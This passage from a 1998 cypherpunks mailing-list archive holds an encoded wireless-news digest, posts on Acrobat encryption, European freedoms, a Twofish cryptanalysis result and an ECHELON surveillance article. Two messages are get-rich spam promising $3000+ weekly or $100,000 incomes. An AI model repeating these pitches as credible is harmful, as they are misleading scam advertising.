LCB3aXRoIDQxIHBlcmNlbnQKb2YgdGhlIG1hcmtldCBzaGFyZSwgZm9sbG93
ZWQgYnkgTm9raWEgd2l0aCAyMCBwZXJjZW50IGFuZCBRVUFMQ09NTSB3aXRo
CjE3IHBlcmNlbnQuIEhvd2V2ZXIsIHNvbWUgYW5hbHlzdHMgZXhwZWN0IEVy
aWNzc29uJ3MgbWFya2V0IHNoYXJlIHRvIGRlY3JlYXNlCmJlY2F1c2UgaXQg
ZG9lcyBub3QgcHJvZHVjZSBvbmUgb2YgdGhlIHRocmVlIGNvbXBldGluZyB0
eXBlcyBvZiBkaWdpdGFsLWNlbGx1bGFyCnBob25lcy4gTm9raWEgaXMgdGhl
IG9ubHkgY29tcGFueSB0aGF0IG1ha2VzIGFsbCB0aHJlZSwgYW5kIE1vdG9y
b2xhIGhhcwpwbGFucyB0byBwcm9kdWNlIGFsbCB0aHJlZSBieSB0aGUgZW5k
IG9mIHRoZSB5ZWFyLiBEYXRhcXVlc3QgYWxzbyBzYXlzCnRoYXQgQ0RNQSB3
YXMgdGhlIHN3aWZ0ZXN0IGdyb3dpbmcgZGlnaXRhbCBzZXJ2aWNlIGxhc3Qg
eWVhciwgd2l0aCBhcHByb3hpbWF0ZWx5Cm9uZS10aGlyZCBvZiBkaWdpdGFs
IGNlbGx1bGFyIHBob25lcyBiZWluZyBDRE1BIGFzIGNvbXBhcmVkIHRvIHRo
cmVlIHBlcmNlbnQKaW4gMTk5Ni4gKDxBIEhSRUY9Imh0dHA6Ly9pbnRlcmFj
dGl2ZS53c2ouY29tL2VkaXRpb24vY3VycmVudC9hcnRpY2xlcy9TQjkwMzMw
MjQ1MTI5OTc0MjUwMC5odG0iPldBTEwKU1QuIEpPVVJOQUw8L0E+KSAtICg8
QSBIUkVGPSJodHRwOi8vYml6LnlhaG9vLmNvbS9idy85ODA4MTcvZGF0YXF1
ZXN0XzEuaHRtbCI+WUFIT088L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+
CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwv
VEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9
IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT4zNCwwMDAgV29ya2Vy
cyBTdHJpa2UKYXQgVSBTIFdFU1Q8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZB
Q0U9IkFyaWFsLEhlbHZldGljYSI+RGVzcGl0ZSBpbnRlbnNlIGxhc3QgbWlu
dXRlIGJhcmdhaW5pbmcKdG8gYXZlcnQgYSBzdHJpa2UsIG5lZ290aWF0b3Jz
IHdlcmUgdW5hYmxlIHRvIHJlYWNoIGFncmVlbWVudCBvbiBvdmVydGltZSwK
aGVhbHRoIGJlbmVmaXRzLCBhbmQgdGhlIGNvbXBhbnkncyBwbGFuIHRvIGxp
bmsgcGF5IHRvIHBlcmZvcm1hbmNlLiAoPEEgSFJFRj0iaHR0cDovL3d3dy5u
ZXdzLmNvbS9OZXdzL0l0ZW0vVGV4dG9ubHkvMCwyNSwyNTMxMiwwMC5odG1s
P3BmdiI+TkVXUy5DT008L0E+KQotICg8QSBIUkVGPSJodHRwOi8vd3d3LnRl
Y2h3ZWIuY29tL3dpcmUvc3RvcnkvcmV1dGVycy9SRVUxOTk4MDgxNlMwMDAx
Ij5URUNICldFQjwvQT4pIC0gKDxBIEhSRUY9Imh0dHA6Ly9kYWlseW5ld3Mu
eWFob28uY29tL2hlYWRsaW5lcy90Yy9zdG9yeS5odG1sP3M9di9ubS8xOTk4
MDgxNy90Yy91c3dlc3RfMi5odG1sIj5ZQUhPTzwvQT4pCi0gKDxBIEhSRUY9
Imh0dHA6Ly93d3cuYm9zdG9uLmNvbS9kYWlseWdsb2JlL2dsb2JlaHRtbC8y
MjkvQ1dBX3VuaW9uX29uX3N0cmlrZV9hdF9VX1NfV2VzdC5zaHRtbCI+Qk9T
VE9OCkdMT0JFPC9BPikgLSAoPEEgSFJFRj0iaHR0cDovL3d3dy51c2F0b2Rh
eS5jb20vbGlmZS9jeWJlci90ZWNoL2N0ZDI3OC5odG0iPlVTQQpUT0RBWTwv
QT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwv
VEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48
Rk9OVCBTSVpFPSsxPlRlbGVjb21tdXRpbmcgdG8gQmVuZWZpdApmcm9tIExv
dy1Db3N0IEJyb2FkYmFuZC9DZWxsdWxhciBSZXZvbHV0aW9uPC9GT05UPjwv
Rk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9U
RD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPlRlbGVjb21t
dXRpbmcgd2lsbCBpbmNyZWFzZSBhcyB0aGUgY29zdApvZiBicm9hZGJhbmQg
c2VydmljZXMgYmVjb21lcyBtb3JlIGFmZm9yZGFibGUgYW5kLCBhcyBob3Bl
ZCwgY2VsbHVsYXIgc2VydmljZQpwcmljZXMgYmVjb21lIGNvbXBhcmFibGUg
dG8gbGFuZGxpbmUgcmF0ZXMsIGFjY29yZGluZyB0byBhdXRob3IgSWFuIFN0
b2tlbGwuCig8QSBIUkVGPSJodHRwOi8vd3d3Lm5ld3NieXRlcy5jb20vcHVi
TmV3cy8xMTY1MzMuaHRtbCI+TkVXU0JZVEVTPC9BPik8L0ZPTlQ+PC9URD4K
CjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9U
RD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+QWZm
b3JkYWJpbGl0eSBhbmQgQXZhaWxhYmlsaXR5CkJyaW5nIEdQUyBUZWNobm9s
b2d5Jm5ic3A7PEJSPgppbnRvIHRoZSBNYWluc3RyZWFtLCBGcm9zdCBhbmQg
U3VsbGl2YW4gUmVzZWFyY2ggU2F5czwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQg
RkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5BY2NvcmRpbmcgdG8gbmV3IHN0cmF0
ZWdpYyByZXNlYXJjaCBjb25kdWN0ZWQKYnkgRnJvc3QgJmFtcDsgU3VsbGl2
YW4gb2YgTm9ydGggQW1lcmljYW4gR1BTIE1hcmtldHMsIHRoZSB0b3RhbCBt
YXJrZXQKaGl0IGFsbW9zdCAkMS4yIGJpbGxpb24gaW4gMTk5NywgbWFpbmx5
IGR1ZSB0byBhcHBsaWNhdGlvbiBncm93dGggaW4gaGlnaAp2b2x1bWUgY29u
c3VtZXIgbWFya2V0cyBpbiBHUFMgbGFuZCBhbmQgbWFyaW5lIG1hcmtldHMu
Jm5ic3A7ICg8QSBIUkVGPSJodHRwOi8vYml6LnlhaG9vLmNvbS9wcm5ld3Mv
OTgwODE3L2NhX2Zyb3N0X3NfMi5odG1sIj5ZQUhPTzwvQT4pPC9GT05UPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJS
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsx
Pk5leHRlbCBKb2lucyBDb21wZXRpdGlvbgpmb3IgV2lyZWxlc3MgTWFya2V0
IFNoYXJlJm5ic3A7PEJSPgppbiBCdWZmYWxvLCBOZXcgWW9yazwvRk9OVD48
L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwv
VEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5OZXh0ZWwg
aXMgdGhlIGZvdXJ0aCB3aXJlbGVzcyBwcm92aWRlcgppbiBXZXN0ZXJuIE5l
dyBZb3JrLCBqb2luaW5nIENlbGx1bGFyIE9uZSwgRnJvbnRpZXIgQ29tbXVu
aWNhdGlvbnMgYW5kClNwcmludCBQQ1MuICg8QSBIUkVGPSJodHRwOi8vd3d3
LmFtY2l0eS5jb20vam91cm5hbHMvaGlnaF90ZWNoL2J1ZmZhbG8vMTk5OC0w
OC0xNy9zdG9yeTguaHRtbCI+QlVTSU5FU1MKRklSU1Q8L0E+KTwvRk9OVD48
L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxC
Uj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
PjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0r
MT5Ub2xsIEZyZWUgQ2VsbHVsYXIgaW4KQ2hhcHRlciA3IEJhbmtydXB0Y3k8
L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+
Q29tcGFueSBleGVjdXRpdmVzIGhhZCBob3BlZCB0byBzZWxsIHRoZQpjb21w
YW55J3MgdGVjaG5vbG9neSB0byBhIGNlbGx1bGFyIGNhcnJpZXIsIGJ1dCB0
aGlzIHdlZWsncyBmaWxpbmcgc3VnZ2VzdHMKdGhhdCBjb3VsZG4ndCBiZSBk
b25lLiAoPEEgSFJFRj0iaHR0cDovL3d3dy5hbWNpdHkuY29tL2pvdXJuYWxz
L2hpZ2hfdGVjaC9zZWF0dGxlLzE5OTgtMDgtMTcvc3Rvcnk4Lmh0bWwiPlBV
R0VUClNPVU5EIEJVU0lORVNTIEpPVVJOQUw8L0E+KTwvRk9OVD48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxG
T05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5UdXJu
aW5nIHRoZSBQYWxtUGlsb3QKaW50byBhIFBsYXRmb3JtIE1ha2VzIEl0IGEg
U3Ryb25nZXIgUHJvZHVjdDwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+
PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0i
QXJpYWwsSGVsdmV0aWNhIj5UaGUgUGFsbVBpbG90IGlzIG5vdyBjb21wYXRp
YmxlIHdpdGggc2NvcmVzCm9mIGFkZC1vbiBzb2Z0d2FyZSBhdmFpbGFibGUg
YXQgYSB2YXJpZXR5IG9mIFdlYiBzaXRlcy4mbmJzcDsgVGhlIGRldmljZXMK
Y2FuIGFsc28gYmUgdXNlZCB3aXRoIGFuIGFycmF5IG9mIGhhcmR3YXJlIHRo
YW4gY2FuIGV4cGFuZCB0aGUgbWFjaGluZSdzCmNhcGFiaWxpdGllcy4gKDxB
IEhSRUY9Imh0dHA6Ly9jaGljYWdvdHJpYnVuZS5jb20vYnVzaW5lc3MvYnVz
aW5lc3NuZXdzL2FydGljbGUvMCwxMDUxLFNBVi05ODA4MTcwMDI4LDAwLmh0
bWwiPkNISUNBR08KVFJJQlVORTwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9U
RD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+
PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFD
RT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPkx1Y2VudCB0byBU
YWtlICQxNDUgTWlsbGlvbgpDaGFyZ2U8L0ZPTlQ+PC9GT05UPjwvQj48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+THVjZW50IHBsYW5zIHRvIHRha2Ug
YSAkODAgbWlsbGlvbiBjaGFyZ2UKZm9yIGluLXByb2Nlc3MgcmVzZWFyY2gg
YW5kIGRldmVsb3BtZW50IHJlbGF0ZWQgdG8gaXRzIGFjcXVpc2l0aW9uIG9m
IFNEWApCdXNpbmVzcyBTeXN0ZW1zLiBMdWNlbnQgYWxzbyBwbGFucyB0byB0
YWtlIGEgb25lLXRpbWUgJDY1IG1pbGxpb24gY2hhcmdlCnJlbGF0ZWQgdG8g
dGhlICQxMTUgbWlsbGlvbiBwdXJjaGFzZSBvZiBMYW5OZXQuICg8QSBIUkVG
PSJodHRwOi8vd3d3Lm5ld3MuY29tL05ld3MvSXRlbS8wLDQsMjUzMjAsMDAu
aHRtbD9zdC5uZS5mZC5tZGgiPk5FV1MuQ09NPC9BPik8L0ZPTlQ+PC9URD4K
CjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9U
RD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+VG9r
eW8gRGlnaXRhbCB0byBBZGQKMjAwIE1vcmUgQmFzZSBTdGF0aW9ucyZuYnNw
OzxCUj4KZm9yIENlbGwgUGhvbmUgU2VydmljZTwvRk9OVD48L0ZPTlQ+PC9C
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5Ub2t5byBEaWdpdGFsIGhv
cGVzIHRvIGNvbXBsZXRlIHRoZSBwcmltYXJ5CmludmVzdG1lbnQgZm9yIGl0
cyBjZWxsdWxhciBwaG9uZSBzZXJ2aWNlIGJ5IHRoZSBlbmQgb2YgZmlzY2Fs
IDE5OTgsIGFoZWFkCm9mIHRoZSBXaWRlYmFuZCBDRE1BIGFkdmFuY2VkIGNl
bGx1bGFyIHBob25lIHNlcnZpY2UgdGhhdCBpcyBleHBlY3RlZCB0bwpiZSBh
dmFpbGFibGUgaW4gMjAwMC4gKDxBIEhSRUY9Imh0dHA6Ly93d3cubmlra2Vp
LmNvLmpwL2VuZXdzL1ROS1MvcGFnZS9IaWdoLVRlY2guaHRtbCNnZW4xNDMi
Pk5JS0tFSQpORVQ8L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+
Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+Cjwv
VFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFs
LEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5Fcmljc3NvbiBTdXBwbGllcyBO
ZXR3b3Jrcwp0byBTaXggTW9yZSBSdXNzaWFuIEFyZWFzPC9GT05UPjwvRk9O
VD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPlRoZSBELUFNUFMg
SVMtMTM2IGRpZ2l0YWwgbW9iaWxlIHBob25lCm5ldHdvcmtzIHdpbGwgb3Bl
cmF0ZSBpbiBCYXNoa29ydG9zdGFuLCBCcnlhbnNrLCBOb3Znb3JvZCwgS29z
dHJvbWEsIFlhcm9zbGF2aQphbmQgSXZhbm92byBieSBlYXJseSAxOTk5LiAo
PEEgSFJFRj0iaHR0cDovL2RhaWx5bmV3cy55YWhvby5jb20vaGVhZGxpbmVz
L3RjL3N0b3J5Lmh0bWw/cz12L25tLzE5OTgwODE3L3RjL2VyaWNzc29uXzEu
aHRtbCI+WUFIT088L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+
Cgo8VFI+CjxURD48L1REPgoKPFREPgo8SFIgV0lEVEg9IjEwMCUiPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQg
RkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0xPkZvciBhZGRp
dGlvbmFsIG5ld3MgYWJvdXQKdGhlIHdpcmVsZXNzIGluZHVzdHJ5LS1pbmNs
dWRpbmcgcGVyaW9kaWMgbmV3cyB1cGRhdGVzIHRocm91Z2hvdXQgdGhlIGRh
eS0tdmlzaXQKPEEgSFJFRj0iaHR0cDovL3d3dy53b3ctY29tLmNvbSI+aHR0
cDovL3d3dy53b3ctY29tLmNvbS48L0E+PC9GT05UPjwvRk9OVD48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPgo8SFIgV0lE
VEg9IjEwMCUiPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwv
VEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBT
SVpFPS0xPkNUSUEgRGFpbHkgTmV3cyBmcm9tIFdPVy1DT00KaXMgdHJhbnNt
aXR0ZWQgd2Vla2RheXMsIGV4Y2VwdCBmb3IgaG9saWRheXMuIFZpc2l0IHVz
IG9uIHRoZSBXb3JsZCBXaWRlCldlYiBhdCA8QSBIUkVGPSJodHRwOi8vd3d3
Lndvdy1jb20uY29tL3Byb2Zlc3Npb25hbCI+aHR0cDovL3d3dy53b3ctY29t
LmNvbS9wcm9mZXNzaW9uYWw8L0E+LiZuYnNwOzwvRk9OVD48L0ZPTlQ+Jm5i
c3A7Cgo8UD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJ
WkU9LTE+SWYgeW91IGFyZSBub3QgaW50ZXJlc3RlZAppbiByZWNlaXZpbmcg
dGhlIENUSUEgRGFpbHkgTmV3cyBmcm9tIFdPVy1DT00sIHBsZWFzZSBzZW5k
IGEgbWVzc2FnZSB0bwo8QSBIUkVGPSJtYWlsdG86dW5qb2luLUNUSUFfRGFp
bHlfTmV3c0B1bTIudW5pdHltYWlsLmNvbSI+dW5qb2luLUNUSUFfRGFpbHlf
TmV3c0B1bTIudW5pdHltYWlsLmNvbTwvQT4uJm5ic3A7PC9GT05UPjwvRk9O
VD4mbmJzcDsKCjxQPjxCPioqKjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGlj
YSI+PEZPTlQgU0laRT0tMT4gVGhlIHRlcm0gInVuam9pbi1DVElBX0RhaWx5
X05ld3NAdW0yLnVuaXR5bWFpbC5jb20iCm11c3QgYmUgbGlzdGVkIGluIHRo
ZSBUTyBzZWN0aW9uIG9mIHRoZSBlbWFpbC48L0ZPTlQ+PC9GT05UPiAqKio8
L0I+Jm5ic3A7Cgo8UD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxG
T05UIFNJWkU9LTE+UGxlYXNlIE5vdGU6IFNvbWUgb2YgdGhlCmxpbmtzIGlu
IHRvZGF5J3MgbmV3cyBhcmUgdGltZSBzZW5zaXRpdmUuJm5ic3A7IFRob3Nl
IGxpbmtzIG1heSBub3QgYmUKYXZhaWxhYmxlIGFzIG5ld3MgY2hhbmdlcyB0
aHJvdWdob3V0IHRoZSBkYXkuJm5ic3A7IEFsc28sIHNvbWUgbmV3cyBzb3Vy
Y2VzCm1heSBiZSBzdWJzY3JpcHRpb24tYmFzZWQgb3IgcmVxdWlyZSByZWdp
c3RyYXRpb24uPC9GT05UPjwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+
Cgo8VFI+CjxURD48L1REPgoKPFREPgo8SFIgV0lEVEg9IjEwMCUiPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KPC9UQUJMRT4KJm5ic3A7PC9jZW50ZXI+Cjwv
Qk9EWT4KPC9IVE1MPgo=
--Boundary..3995.1071713795.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fade <fade@mail1.i1.net>
Date: Mon, 17 Aug 1998 13:35:47 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Adobe Acrobat encryption details
In-Reply-To: <Pine.BSI.3.95.980817105445.1266A-100000@mail1.i1.net>
Message-ID: <Pine.BSI.3.95.980817153638.2390A-100000@mail1.i1.net>
MIME-Version: 1.0
Content-Type: text/plain



Thanks to the people who responded, with their help, I was able to find a
very excellent page about the topic, which I thought I'd post here for
anyone else who might be interested.

http://www.hedgie.com/passwords/acrobat2.html

-=fade=-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: freeinternet@usmc.net
Date: Mon, 17 Aug 1998 01:49:10 -0700 (PDT)
To: freeinternet@usmc.net
Subject: Your Computer
Message-ID: <199808170845.RAA26004@ns.nitteku.co.jp>
MIME-Version: 1.0
Content-Type: text/plain


Want $3000+ every single week? 

Need a hot new computer to build your biz? 

Complete systems fully loaded! 
Zero down lease/purchase 
all credit levels pre-approved. 

What's the catch? 

Click Here for more information
mailto:freecomputer@letterbox.com?subject=information

To be Taken off our list Click here
mailto:freecomputer@letterbox.com?subject=delete








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: FTPPork@aol.com
Date: Mon, 17 Aug 1998 14:47:40 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: European freedoms...
Message-ID: <66246158.35d8a4a1@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Because the American Justice system is screwed up royally...
for instance - Kevin Mitnick...
www.KevinMitnick.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <anon@squirrel.owl.de>
Date: Mon, 17 Aug 1998 14:06:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: European freedoms...
In-Reply-To: <3.0.3.32.19980816170758.00814ad0@apf2.com>
Message-ID: <4ba9a7724438e3da22a58b331b341097@anonymous>
MIME-Version: 1.0
Content-Type: text/plain


>With the exception of some lifestyle options Europeans probably have 
>less freedoms than Americans.

How come that the fraction of Americans in prison is ten times higher
than the fraction of West Europeans?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Mon, 17 Aug 1998 21:55:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Announcement: New Twofish Results
Message-ID: <4.0.1.19980817211218.00e4f7f0@mail.visi.com>
MIME-Version: 1.0
Content-Type: text/plain


                                          Results Announcement:

N. Ferguson, , "Upper Bounds on Differential Characteristics in Twofish," Twofish Technical Report #1, Counterpane Systems, Aug 1998.

                                                     Abstract:
In our initial paper the Twofish block cipher was introduced, and initial estimates of an upper bounds on the probability of a 12-round differential were given. These results used an imperfect model of Twofish. We present an improved model, and show that any 12-round differential characteristic has a probability of at most $2^{-102.8}$.


This paper is available at http://www.counterpane.com/twofish.html, and will be made available 
at the AES Workshop next week.

Cheers,
Bruce 
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "ronald" <mgbnospam@06138.com>
Date: Mon, 17 Aug 1998 18:39:18 -0700 (PDT)
To: Friend@public.com
Subject: This free 800# can change your life
Message-ID: <199808180130.KAA00691@mail.sun-inet.or.jp>
MIME-Version: 1.0
Content-Type: text/plain


1-800-811-2141 Code # 58420 That 800# is better than your ATM CA$H
machine!  People are earning over $100,000.00 by advertising our 800# !  
How?  Well all the negatives have been eliminated:
No selling, No Conf Calls, No Tapes, No Videos, No Trainings, No Monthly
Quotas, No complicated marketing, No Big Investment
CALL NOW to hear all the simple details 1-800-811-2141 CODE #58420  
Mon-Sat 8:00 am - 10:00 pm (CST)  Want paperwork in your hands FOD: 415-273-6020 (7 pgs.)
HOW WELL DOES IT WORK?  Listen to these Toll Free Audios: 
"BIG MAC" 1-888-446-6951,  Richard Fischeti: 1-888-446-6949, Gay Dietch: 1-888-703-5389
Take a listen and Good Luck


This message is being sent to you in compliance with the proposed Federal
legislation for commercial email (S. 1618-Section 301).
http://www.senate.gov~murkowski/commercialemail/EMailAmendText.html

"Pursuant to Section 301, Paragraph (a)(2)(C) of S. 1618, further
transmissions to you by the sender of this email may be stopped at no cost to
you by sending a reply to this email advising of your desire.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ric V. Carvalho" <gandalf@waverly.net>
Date: Mon, 17 Aug 1998 21:13:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: ECHELON  SYSTEM
Message-ID: <l03130303b1fe69885b35@[204.17.209.169]>
MIME-Version: 1.0
Content-Type: text/plain


Thought you all might be interested in seeing this.
-R

http://www.villagevoice.com/ink/news/33vest.shtml


Listening In

Suppose, this past weekend, you sent an e-mail to a friend overseas.=20
There's a reasonable possibility your communication was intercepted by a
global surveillance system--especially if you happened to discuss last
week's bombings in East Africa.=20

Or suppose you're stuck in traffic and in your road rage you whip out a
cell phone and angrily call your congressman's office in Washington.=20
There's a chance the government is listening in on that conversation, too
(but only for the purposes of "training" new eavesdroppers).=20

Or suppose you're on a foreign trip--vacation, business, relief work--and
you send off a fax to some folks that Washington doesn't view too keenly.
Your message could be taken down and analyzed by the very same system.=20

That system is called ECHELON and it is controlled by the U.S. National
Security Agency (NSA). In America, it is the Intelligence Network That
Dare Not Be Acknowledged. Questions about it at Defense Department
briefings are deftly deflected.  Requests for information about it under
the Freedom of Information Act linger in bureaucratic limbo.  Researchers
who mention possible uses of it in the presence of intelligence officials
are castigated. Members of Congress--theoretically, the people's
representatives who provide oversight of the intelligence
community--betray no interest in helping anyone find out anything about
it. Media outlets (save the award-winning but low-circulation Covert
Action Quarterly) ignore it.  In the official view of the U.S.=20
Government, it doesn't exist.=20

But according to current and former intelligence officials, espionage
scholars, Australian and British investigative reporters, and a dogged Ne=
w
Zealand researcher, it is all too real. Indeed, a soon-to-be finalized
European Parliament report on ECHELON has created quite a stir on the
other side of the Atlantic.  The report's revelations are so serious that
it strongly recommends an intensive investigation of NSA operations.=20

The facts drawn out by these sources reveal ECHELON as a powerful
electronic net--a net that snags from the millions of phone, fax, and
modem signals traversing the globe at any moment selected communications
of interest to a five-nation intelligence alliance.  Once intercepted
(based on the use of key words in exchanges), those communiqu=E9s are sen=
t
in real time to a central computer system run by the NSA; round-the-clock
shifts of American, British, Australian, Canadian, and New Zealand
analysts pour over them in search of . . .  what?=20

Originally a Cold War tool aimed at the Soviets, ECHELON has been
redirected at civilian targetsworldwide. In fact, as the European
Parliament report noted, political advocacy groups like Amnesty
International and Greenpeace were amongst ECHELON's targets. The system's
awesome potential (and potential for abuse) has spurred some traditional
watchdogs to delve deep in search of its secrets, and even prompted some
of its minders within the intelligence community to come forward. "In som=
e
ways," says Reg Whittaker, a professor and intelligence scholar at
Canada's York University, "it's probably the most useful means of getting
at the Cold War intelligence-sharing relationship that still continues."=20

While the Central Intelligence Agency--responsible for covert operations
and human-gathered intelligence, or HUMINT--is the spy agency most people
think of, the NSA is, in many respects, the more powerful and important o=
f
the U.S.  intelligence organizations. Though its most egregious excesses
of 20 years ago are believed to have been curbed, in addition to
monitoring all foreign communications, it still has the legal authority t=
o
intercept any communication that begins or ends in the U.S., as well as
use American citizens' private communications as fodder for trainee spies.
Charged with the gathering of signals intelligence, or SIGINT--which
encompasses all electronic communications transmissions--the NSA is
larger, better funded, and infinitely more secretive than the CIA. Indeed=
,
the key document that articulates its international role has never seen
the light of day.=20

That document, known as the UKUSA Agreement, forged an alliance in 1948
among five countries--the U.S., Britain, Australia, Canada, and New
Zealand--to geographically divvy up SIGINT-gathering responsibilities,
with the U.S. as director and main underwriter. Like the NSA--hardly know=
n
until the Pike and Church congressional investigations of the '70s--the
other four countries' SIGINT agencies remain largely unknown and
practically free of public oversight. While other member nations conduct
their own operations, there has "never been any misunderstanding that
we're NSA subsidiaries," according to Mike Frost, an ex-officer in
Canada's SIGINT service, the Communications Security Establishment (CSE).=
=20
Moreover, all the signatory countries have NSA listening posts within
their borders that operate with little or no input from the local agency.=
=20

[snip... please see URL for rest of article.]

-o-
Subscribe: mail majordomo@sekurity.org with "subscribe isn".
Today's ISN Sponsor: New Dimensions International [www.newdimensions.net]
----------------------------------------------------------------------
Reply From: Simon Johnson <simon.johnson@shake.net>

Hello All,

For those that are interested in Echelon. (oops I've said the "E" word) I
would recommend the following book:

Title: Secret Power - "New Zealand's Role In The International Spy Network"
Author: Nicky Hager
Publisher: Craig Potton Publishing
ISBN: 0-908802-35-8

It was this book that made the Echelon system public knowledge.

Press Release:

http://www.fas.org/irp/eprint/sp/sp_p.htm

More Information:

